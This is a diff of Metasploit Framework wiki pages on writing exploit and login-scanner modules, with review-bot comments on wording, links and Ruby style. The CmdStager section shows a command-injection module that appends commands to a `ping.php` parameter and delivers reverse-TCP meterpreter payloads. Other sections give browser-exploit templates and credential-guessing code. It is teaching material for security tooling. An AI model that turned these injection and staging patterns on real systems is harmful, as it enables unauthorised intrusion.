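Review bot: the new opening sentence has lost its apostrophes ("If youve found", "youd like") and has a wrong preposition ("the leverage that ability" should be "to leverage that ability"); the curly apostrophes were probably stripped, as also happened to "weve", "Thats" and "dont" further down in this file. "to save (or not save) your payload, sometimes decode, and execute" is hard to parse; "to save your payload (or run it without saving), decode it where needed, and execute it" says what is meant.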
@@ -85,7 +87,7 @@ An example of setting flavors for a specific target:
]
```
Or, you can pass this info to the `execute_cmdstager` method (see Call #execute_cmdstager to begin).
Or, you can pass this info to the `execute_cmdstager` method (see Step 4 to begin).
```ruby
execute_cmdstager(flavor: :vbs)
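Review bot: "see Step 4 to begin" no longer points where it did. In this change the heading "4. Call #execute_cmdstager to begin" is replaced by "4. Decide on the supported payloads", and the `execute_cmdstager` call is now described under the following heading, which is also numbered 4. Refer to the section by name, or renumber the steps and update this reference in the same commit.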
@@ -96,11 +98,62 @@ However, it is best to set the compatible list of flavors in `CmdStagerFlavor`,
**3. Create the execute_command method**
You also must create a ```def execute_command(cmd, opts = {})``` method in your module. This is what gets called by the CmdStager mixin when it kicks in. Your objective in this method is to inject whatever is in the ```cmd``` variable to the vulnerable code.
You also must create a ```def execute_command(cmd, opts = {})``` method in your module. This is how you define how to execute a command on the target. The parameter `cmd` is the command to execute. When writing the ```execute_cmd``` method, remember that
**4. Call #execute_cmdstager to begin**
**4. Decide on the supported payloads**
And lastly, in your exploit method, call ```execute_cmdstager``` to begin the command stager.
CmdStagers are intended to support payloads that are uploaded, saved to disk, and launched, but many of the payloads in Metasploit Framework do not need to be saved to disk; these payloads are `ARCH_CMD` payloads that rely on software already present on the target system like netcat, bash, python, or ssh. Depending on whether the payload needs to be saved to disk or not changes what payloads are supported and how we launch the payload, so we must provide the user the ability to pick between the two.
The best way to let the user decide what kind of payload to use is by defining separate [[targets|Get-Started-Writing-an-Exploit.md]]
Here is an example targets section from a command injection module:
```
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',
'RPORT' => 9000
}
}
],
[
'Linux (Dropper)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X64],
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
'Type' => :linux_dropper
}
],
```
The first target is the `ARCH_CMD` target and `unix` platform. This allows the user to select any payload that starts with `cmd/unix`. These payloads do not need to be saved to disk and can just be launched at the command line. The second is `ARCH_X64` and the platform is `linux`; this lets us choose any payload that starts with `linux/x64`. These targets must be saved to disk before they can be launched, and as such, you will often see this second type of payload referred to as a dropper because the file must be dropped to the disk before it can be executed. In each of the targets above, weve selected a default payload we know will work.
**4. Executing a payload**
As we said earlier, the way a payload is executed depends on the payload type. By including `Msf::Exploit::CmdStager` you are given access to a method called ```execute_cmdstager```. ```execute_cmdstager``` makes a list of required commands to upload, save, and execute your payload, then uses the ```execute_command``` method you defined earlier to run them on the target.
Unfortunately, we just mentioned not all payloads need to be saved to disk. In the case of a payload that does not need to be saved to disk, we only need to call ```execute_command```.
This problem of payload/method juggling sounds far worse than it is. Below is a quick example of how simple the ```exploit``` method will become if you have properly defined your targets as discussed in step 3:
```ruby
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end
```
Thats it. If the user selects an `ARCH_CMD` payload, we call the ```execute_command``` method on the _already_ _encoded_ payload. You dont need to worry about encoding the payload in your ```execute_command``` method.
If the user has selected a binary payload like `ARCH_X64` or `ARCH_X86`, then we call ```execute_cmdstager``` which figures out how to save the file to disk and launch it based on the flavor you set earlier.
Over the years, we have also learned that these options are quite handy when calling
`execute_cmdstager`:
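Review bot: the rewritten "You also must create a def execute_command(cmd, opts = {}) method" line ends mid-sentence ("remember that") and refers to an `execute_cmd` method that does not exist (the method is `execute_command`); finish the sentence or drop the trailing clause. In the same hunk two headings are numbered "4." ("Decide on the supported payloads" and "Executing a payload") while the later text says "targets as discussed in step 3", so the numbering needs one consistent pass. The new `'Targets'` block is fenced with a bare ``` where the rest of the file uses ```ruby, and "These targets must be saved to disk" should say "These payloads must be saved to disk".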
@@ -119,22 +172,26 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "Command Injection Using CmdStager",
'Description' => %q{
This exploits a command injection using the command stager.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' => [ [ 'URL', 'http://metasploit.com' ] ],
'Platform' => 'linux',
'Targets' => [ [ 'Linux', {} ] ],
'Payload' => { 'BadChars' => "\x00" },
'CmdStagerFlavor' => [ 'printf' ],
'Privileged' => false,
'DisclosureDate' => "2016-06-10",
'DefaultTarget' => 0))
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Command Injection Using CmdStager',
'Description' => %q{
This exploits a command injection using the command stager.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' => [ [ 'URL', 'http://metasploit.com' ] ],
'Platform' => 'linux',
'Targets' => [ [ 'Linux', {} ] ],
'Payload' => { 'BadChars' => "\x00" },
'CmdStagerFlavor' => [ 'printf' ],
'Privileged' => false,
'DisclosureDate' => '2016-06-10',
'DefaultTarget' => 0
)
)
end
def execute_command(cmd, opts = {})
@@ -142,7 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
print_status("Exploiting...")
print_status('Exploiting...')
execute_cmdstager
end
@@ -158,7 +215,7 @@ Now let's modify the `execute_command` method and get code execution against the
127.0.0.1+%26%26+[Malicious commands]
```
We do that in `execute_command` using [HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:
We do that in `execute_command` using [[HttpClient|./How-to-Send-an-HTTP-Request-Using-HttpClient.md]]. Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:
```ruby
def filter_bad_chars(cmd)
@@ -167,19 +224,21 @@ def filter_bad_chars(cmd)
cmd.gsub!(/ /, '+')
end
def execute_command(cmd, opts = {})
send_request_cgi({
'method' => 'GET',
'uri' => '/ping.php',
'encode_params' => false,
'vars_get' => {
'ip' => "127.0.0.1+%26%26+#{filter_bad_chars(cmd)}"
def execute_command(cmd, _opts = {})
send_request_cgi(
{
'method' => 'GET',
'uri' => '/ping.php',
'encode_params' => false,
'vars_get' => {
'ip' => "127.0.0.1+%26%26+#{filter_bad_chars(cmd)}"
}
}
})
)
end
def exploit
print_status("Exploiting...")
print_status('Exploiting...')
execute_cmdstager
end
```
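Review bot: in the context line `cmd.gsub!(/ /, '+')` that ends `filter_bad_chars`, `gsub!` returns `nil` when nothing was replaced, so a command with no spaces makes `filter_bad_chars(cmd)` return `nil` and the interpolation in `'ip' => "127.0.0.1+%26%26+#{filter_bad_chars(cmd)}"` sends an empty command. Use the non-mutating form so the method always returns the string: `cmd.gsub(/ /, '+')` (or `cmd.tr(' ', '+')`). The rename to `_opts` is fine since the argument is unused.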
@@ -187,10 +246,10 @@ end
And let's run that, we should have a shell:
```
```msf
msf exploit(cmdstager_demo) > run
[*] Started reverse TCP handler on 10.6.0.92:4444
[*] Started reverse TCP handler on 10.6.0.92:4444
[*] Exploiting...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 10.6.0.92
@@ -223,7 +282,7 @@ Available flavors:
The [VBS command stager](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/vbs.rb) is for Windows. What this does is it encodes our payload with Base64, save it on the target machine, also writes a [VBS script](https://github.com/rapid7/rex-exploitation/blob/master/data/exploits/cmdstager/vbs_b64) using the echo command, and then lets the VBS script to decode the Base64 payload, and execute it.
If you are exploiting Windows that supports Powershell, then you might want to [consider using that instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit) of the VBS stager, because Powershell tends to be more stealthy.
If you are exploiting Windows that supports Powershell, then you might want to [[consider using that instead|./How-to-use-Powershell-in-an-exploit.md]] of the VBS stager, because Powershell tends to be more stealthy.
To use the VBS stager, either specify your CmdStagerFlavor in the metadata:
@@ -21,7 +21,7 @@ option, which can be set by using the `setg` command. Module-level means only th
remembers that datastore option, no other components will know about it. You are setting a module-level option if you
load a module first, and then use the `set` command, like the following:
```
```msf
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 10.0.1.3
rhost => 10.0.1.3
@@ -238,34 +238,34 @@ from the module's metadata, and update again.
Here's an example of an exploit module's initialize portion with the DefaultOptions key:
```ruby
def initialize(info={})
super(update_info(info,
'Name' => "Module name",
'Description' => %q{
This is an example of setting the default value of RPORT using the DefaultOptions key
},
'License' => MSF_LICENSE,
'Author' => [ 'Name' ],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Module name',
'Description' => %q{
This is an example of setting the default value of RPORT using the DefaultOptions key
},
'License' => MSF_LICENSE,
'Author' => [ 'Name' ],
'References' => [
[ 'URL', '' ]
],
'Platform' => 'win',
'Targets' =>
[
'Platform' => 'win',
'Targets' => [
[ 'Windows', { 'Ret' => 0x41414141 } ]
],
'Payload' =>
{
'Payload' => {
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'DefaultOptions' => {
'RPORT' => 8080
},
'Privileged' => false,
'DisclosureDate' => "",
'DefaultTarget' => 0))
'Privileged' => false,
'DisclosureDate' => '',
'DefaultTarget' => 0
)
)
end
```
@@ -27,13 +27,14 @@ OPTIONS:
-c Clear the contents of the favorite modules file
-d Delete module(s) or the current active module from the favorite modules file
-h Help banner
-l Print the list of favorite modules (alias for `show favorites`)
```
The second method of adding favorites allows adding multiple modules at once:
```shell
```msf
msf6 > favorite exploit/multi/handler exploit/windows/smb/psexec
[+] Added exploit/multi/handler to the favorite modules file
[+] Added exploit/windows/smb/psexec to the favorite modules file
@@ -72,7 +73,7 @@ msf6 > favorite -d exploit/multi/handler exploit/windows/smb/psexec
#### Clearing the favorites list
```shell
```msf
msf6 > show favorites
Favorites
@@ -89,3 +90,18 @@ msf6 > show favorites
[!] The favorite modules file is empty
```
### Printing the list of favorite modules
The list of favorite modules can be printed by supplying the `-l` flag. This is an alias for the `show favorites` and `favorites` commands.
```shell
msf6 > favorite -l
Favorites
=========
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/handler manual No Generic Payload Handler
1 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
```
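Review bot: the new "Printing the list of favorite modules" section fences its console transcript with ```shell, while the two earlier hunks in this same file switch ```shell to ```msf; use ```msf here as well. The sentence "This is an alias for the `show favorites` and `favorites` commands" names a `favorites` command that the OPTIONS banner above does not mention ("-l Print the list of favorite modules (alias for `show favorites`)"); make the two descriptions agree.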
@@ -351,7 +351,7 @@ end
The module will start the http server and print the repo to clone
```
```msf
msf6 > use exploit/multi/http/git_clone_test
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/git_clone_test) > set srvport 9999
@@ -23,7 +23,7 @@ When the mixin is included, notice there will be the following datastore options
* **TCP::max_send_size** - Evasive option. Maxiumum TCP segment size.
* **TCP::send_delay** - Evasive option. Delays inserted before every send.
If you wish to learn how to change the default value of a datastore option, please read "[Changing the default value for a datastore option](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options#changing-the-default-value-for-a-datastore-option)"
If you wish to learn how to change the default value of a datastore option, please read "[[Changing the default value for a datastore option|./How-to-use-datastore-options.md]]"
## Make a connection
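Review bot: the rewritten link drops the `#changing-the-default-value-for-a-datastore-option` fragment that the old URL carried, so the reader now lands at the top of How-to-use-datastore-options.md instead of the section the sentence promises; keep the fragment in the wiki-link target if the docs renderer supports it. While this paragraph is being touched, the context line `Evasive option. Maxiumum TCP segment size.` has a typo (`Maximum`).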
@@ -1,6 +1,6 @@
This is a step-by-step guide on how to write a HTTP login module using the latest LoginScanner and Credential APIs.
Before we begin, it's probably a good idea to read [Creating Metasploit Framework LoginScanners](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners), which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.
Before we begin, it's probably a good idea to read [[Creating Metasploit Framework LoginScanners|./Creating-Metasploit-Framework-LoginScanners.md]], which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.
## Step 1: Set up your target environment
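Review bot: grammar in the rewritten sentence: `the Credential API can found as` should read `can be found as`. The link text also says `lib/metasploit/framework/loginscanner` while the URL path is `login_scanner`; align the text with the real directory name so readers can find it in a checkout.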
@@ -245,7 +245,6 @@ A basic auxiliary module template in our case would be something like this:
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasploit/framework/login_scanner/symantec_web_gateway'
require 'metasploit/framework/credential_collection'
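Review bot: this hunk trims one line from the require block of the login-scanner template, but the other templates touched in the same change (the BrowserExploitServer, HttpServer and HttpClient examples) still carry `require 'msf/core'`, which current modules no longer need because the framework loads it; drop it from those templates too so the examples are consistent with each other.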
@@ -256,21 +255,23 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Symantec Web Gateway Login Utility',
'Description' => %q{
This module will attempt to authenticate to a Symantec Web Gateway.
},
'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true,
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Symantec Web Gateway Login Utility',
'Description' => %q{
This module will attempt to authenticate to a Symantec Web Gateway.
},
'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'SSLVersion' => 'TLS1'
}
))
)
)
end
def run_host(ip)
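Review bot: `'SSLVersion' => 'TLS1'` in `DefaultOptions` is carried over unchanged; since this template is being brought up to the current style anyway, consider whether a tutorial should still pin TLS 1.0 (a deprecated protocol version) as the default, or drop the option and let the connection negotiate the highest version the target supports. The restyle itself to `super(update_info(info, ...))` with `'DefaultOptions' => {` on one line matches the current module layout.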
@@ -382,7 +383,7 @@ And finally, make sure your module actually works.
Test for a successful login:
```
```msf
msf auxiliary(symantec_web_gateway_login) > run
[+] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Success: 'sinn3r:GoodPassword'
@@ -393,7 +394,7 @@ msf auxiliary(symantec_web_gateway_login) >
Test for a failed login:
```
```msf
msf auxiliary(symantec_web_gateway_login) > run
[-] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Failed: 'sinn3r:BadPass'
@@ -1,8 +1,8 @@
The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are:
* **[Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer)** - The most basic form of a HTTP server.
* **[[Msf::Exploit::Remote::HttpServer|./How-to-write-a-browser-exploit-using-HttpServer.md]]** - The most basic form of a HTTP server.
* **[Msf::Exploit::Remote::HttpServer::HTML](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http_server/html.rb)** - which provides Javascript functions that the module can use when crafting HTML contents.
* **[Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.
* **[[Msf::Exploit::Remote::BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]]** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.
### The Automatic Exploitation Procedure
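Review bot: the rewritten first bullet keeps `The most basic form of a HTTP server`; it should be `an HTTP server`. The BrowserExploitServer bullet also still links the mixin source at a commit-pinned blob (`a7d255bbe55...`), which will drift from the current file; a `master` link would age better than a fixed commit for a "this writeup covers" reference.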
@@ -139,7 +139,7 @@ def on_request_exploit(cli, request, target_info)
</html>
|
send_exploit_html(cli, html)
end
end
```
[ERB](http://ruby-doc.org/stdlib-2.1.3/libdoc/erb/rdoc/ERB.html) is a new way to write Metasploit browser exploits. If you've written one or two web applications, this is no stranger to you. When you're using the BrowserExploitServer mixin to write an exploit, what really happens is you're writing a rails template. Here's an example of using of this feature:
@@ -198,69 +198,68 @@ To get thing started, here's a code example you can use start developing your br
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "BrowserExploitServer Example",
'Description' => %q{
This is an example of building a browser exploit using the BrowserExploitServer mixin
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'BrowserExploitServer Example',
'Description' => %q{
This is an example of building a browser exploit using the BrowserExploitServer mixin
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' => [
[ 'URL', 'http://metasploit.com' ]
],
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
'Platform' => 'win',
'BrowserRequirements' => {
source: /script|headers/i
},
'Targets' =>
[
'Targets' => [
[ 'Automatic', {} ],
[
'Windows XP with IE 8',
{
'os_name' => 'Windows XP',
'ua_name' => 'MSIE',
'ua_ver' => '8.0'
'os_name' => 'Windows XP',
'ua_name' => 'MSIE',
'ua_ver' => '8.0'
}
],
[
'Windows 7 with IE 9',
{
'os_name' => 'Windows 7',
'ua_name' => 'MSIE',
'ua_ver' => '9.0'
'os_name' => 'Windows 7',
'ua_name' => 'MSIE',
'ua_ver' => '9.0'
}
]
],
'Payload' => { 'BadChars' => "\x00" },
'DisclosureDate' => "Apr 1 2013",
'DefaultTarget' => 0))
'Payload' => { 'BadChars' => "\x00" },
'DisclosureDate' => '2013-04-01',
'DefaultTarget' => 0
)
)
end
def exploit_template(target_info)
template = %Q|
template = %(
Data source: <%=target_info[:source]%><br>
OS name: <%=target_info[:os_name]%><br>
UA name: <%=target_info[:ua_name]%><br>
UA version: <%=target_info[:ua_ver]%><br>
Java version: <%=target_info[:java]%><br>
Office version: <%=target_info[:office]%>
|
)
return template, binding()
return template, binding
end
def on_request_exploit(cli, request, target_info)
def on_request_exploit(cli, _request, target_info)
send_exploit_html(cli, exploit_template(target_info))
end
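Review bot: in `exploit_template`, switching the literal from `%Q|...|` to `%(...)` makes parentheses the delimiter, which Ruby only tolerates in balanced pairs inside the body; the current template contains none, so this works, but anyone extending it with an unbalanced `(` (typical in inline JavaScript) will get a syntax error that the old `|` delimiter would not have produced. Either keep `%Q|` or add a one-line comment warning about the delimiter. The `'References'` URL `http://metasploit.com` is also plain HTTP; prefer `https://`.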
@@ -296,7 +295,7 @@ If your BES-based exploit does not want obfuscation at all, always make sure you
deregister_options('JsObfuscate')
```
To learn more about Metasploit's JavaScript obfuscation capabilities, please read [How to obfuscate JavaScript in Metasploit](https://github.com/rapid7/metasploit-framework/wiki/How-to-obfuscate-JavaScript-in-Metasploit).
To learn more about Metasploit's JavaScript obfuscation capabilities, please read [[How to obfuscate JavaScript in Metasploit|./How-to-obfuscate-JavaScript-in-Metasploit.md]].
### Related Articles:
@@ -1,4 +1,4 @@
The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer), Msf::Exploit::Remote::HttpServer::HTML and [Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer). This writeup covers the HttpServer mixin.
The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [[Msf::Exploit::Remote::HttpServer|./How-to-write-a-browser-exploit-using-HttpServer.md]], Msf::Exploit::Remote::HttpServer::HTML and [[Msf::Exploit::Remote::BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]]. This writeup covers the HttpServer mixin.
The HttpServer mixin is kind of the mother of all HTTP server mixins (like BrowserExploitServer and HttpServer::HTML). To use it, your module is required to have a "on_request_uri" method, which is a callback triggered when the HTTP server receives a HTTP request from the browser. An example of setting up "on_request_uri":
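Review bot: the rewritten paragraph links the HttpServer and BrowserExploitServer mixins but leaves `Msf::Exploit::Remote::HttpServer::HTML` as bare text, while the sibling BrowserExploitServer page links it to its source file; link it here the same way. In the context line that follows, `a "on_request_uri" method` and `a HTTP request` should both be `an`.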
@@ -78,36 +78,36 @@ To get things started, you can always use the following template to start develo
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
'Name' => "HttpServer mixin example",
'Description' => %q{
Here's an example of using the HttpServer mixin
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'HttpServer mixin example',
'Description' => %q{
Here's an example of using the HttpServer mixin
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' => [
[ 'URL', 'http://metasploit.com' ]
],
'Platform' => 'win',
'Targets' =>
[
'Platform' => 'win',
'Targets' => [
[ 'Generic', {} ],
],
'DisclosureDate' => "Apr 1 2013",
'DefaultTarget' => 0))
'DisclosureDate' => '2013-04-01',
'DefaultTarget' => 0
)
)
end
def on_request_uri(cli, request)
html = "hello"
def on_request_uri(cli, _request)
html = 'hello'
send_response(cli, html)
end
@@ -7,48 +7,48 @@ Say you want to exploit a web server or web application. You have code execution
Here is how you can set it up:
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "HttpClient and HttpServer Example",
'Description' => %q{
This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time,
but this allows the HttpServer to terminate after a delay.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'HttpClient and HttpServer Example',
'Description' => %q{
This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time,
but this allows the HttpServer to terminate after a delay.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' => [
['URL', 'http://metasploit.com']
],
'Payload' => { 'BadChars' => "\x00" },
'Platform' => 'win',
'Targets' =>
[
'Payload' => { 'BadChars' => "\x00" },
'Platform' => 'win',
'Targets' => [
[ 'Automatic', {} ],
],
'Privileged' => false,
'DisclosureDate' => "Dec 09 2013",
'DefaultTarget' => 0))
'Privileged' => false,
'DisclosureDate' => '2013-12-09',
'DefaultTarget' => 0
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The path to some web application', '/']),
OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
], self.class)
register_options(
[
OptString.new('TARGETURI', [true, 'The path to some web application', '/']),
OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
], self.class
)
end
def on_request_uri(cli, req)
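Review bot: `register_options([...], self.class)` keeps the explicit `self.class` owner argument after the restyle; current modules call `register_options([...])` without it, so drop it while this template is being modernised. The header comment `# This module requires Metasploit: http://metasploit.com/download` is also plain HTTP.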
@@ -58,15 +58,13 @@ class MetasploitModule < Msf::Exploit::Remote
def primer
print_status("Sending a malicious request to #{target_uri.path}")
send_request_cgi({'uri'=>normalize_uri(target_uri.path)})
send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
end
def exploit
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
# When the server stops due to our timeout, this is raised
end
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
# When the server stops due to our timeout, this is raised
end
end
```
@@ -82,7 +80,7 @@ In case you're wondering why the web server must terminate after a period of tim
The output for the above example should look something like this:
```
```msf
msf exploit(test) > run
[*] Exploit running as background job.
@@ -30,7 +30,7 @@ The exploit should say what requirements are not met. The requirements are expla
If you'd like to check the comparisons, simply set VERBOSE to true. The following is an example:
```
```msf
msf exploit(ms13_022_silverlight_script_object) > set VERBOSE true
VERBOSE => true
msf exploit(ms13_022_silverlight_script_object) > run
@@ -1,13 +1,13 @@
**This page is meant for Committers. If you are unsure whether you are a committer, you are not.**
Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [Dev environment setup](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.
Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [[Dev environment setup|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.
# The short story
- Configure your git environment as described [here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#keeping-in-sync).
- Configure your git environment as described [[here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]].
- Add the `fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*` line to your `.git/config`.
- Add your signing key `git config --global user.signingkey`
- Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below:
- Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below:
```
pub rsa4096 2020-04-07 [SC]
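Review bot: the `Configure your git environment as described [[here|...]]` link drops the `#keeping-in-sync` fragment the old URL pointed to, so it now lands on the top of the setup page instead of the section about keeping a fork in sync; keep the fragment in the wiki-link target.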
@@ -16,7 +16,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
sub rsa4096 2020-04-07 [E]
```
- Set the GPG key as your signing key. To set the key shown above as the signing key for all repositories, one would execute:
```
git config --global user.signingkey 3198961E148FF5E527E31A5FD35E05C0F2B81E83
```
@@ -30,13 +30,13 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
Fixes #1024, also see #999.
````
- The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a
- The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a
nice assurance that you're really you.
- The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if
- The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if
the merge would normally be resolved as a fast forwards. This ensure that all changes have a
commit associated with them.
- The `--edit` flag will drop you into your default editor (normally vim), and will allow you
to edit the commit message so that it conforms to Metasploit standards, rather than sticking
- The `--edit` flag will drop you into your default editor (normally vim), and will allow you
to edit the commit message so that it conforms to Metasploit standards, rather than sticking
with git's pre-generated commit message which does not.
- Note that the `--no-ff` flag should be used both for PRs that go back to a contributor's branch as well as PRs that land in Metasploit's master branch.
- If you're making changes (often the case), merge to a landing branch, then merge **that** branch to upstream/master with the `-S --no-ff --edit` options.
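Review bot: this hunk only strips trailing whitespace, so it is a good moment to fix the wording in the neighbouring context lines: `This ensure that all changes have a commit` should be `This ensures`, and `resolved as a fast forwards` should be `resolved as a fast-forward`.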
@@ -46,7 +46,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
Check out [this gist](https://gist.github.com/todb-r7/3fbee1a9e7b36d82ca55) that automates (mostly) landing pull requests, signing the merge commit, all while rarely losing a race with other committers.
# Fork and clone
First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [as described here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#wiki-ssh), but the https method will work, too.
First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [[as described here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]], but the https method will work, too.
Once this is done, you will have a remote repository called "origin," which points to your forked repository on GitHub. You will be doing most of your work in your own fork of Metasploit, even if you have commit rights to Rapid7's fork. Now, we're going to add an "upstream" repository to talk to the Rapid7 repository.
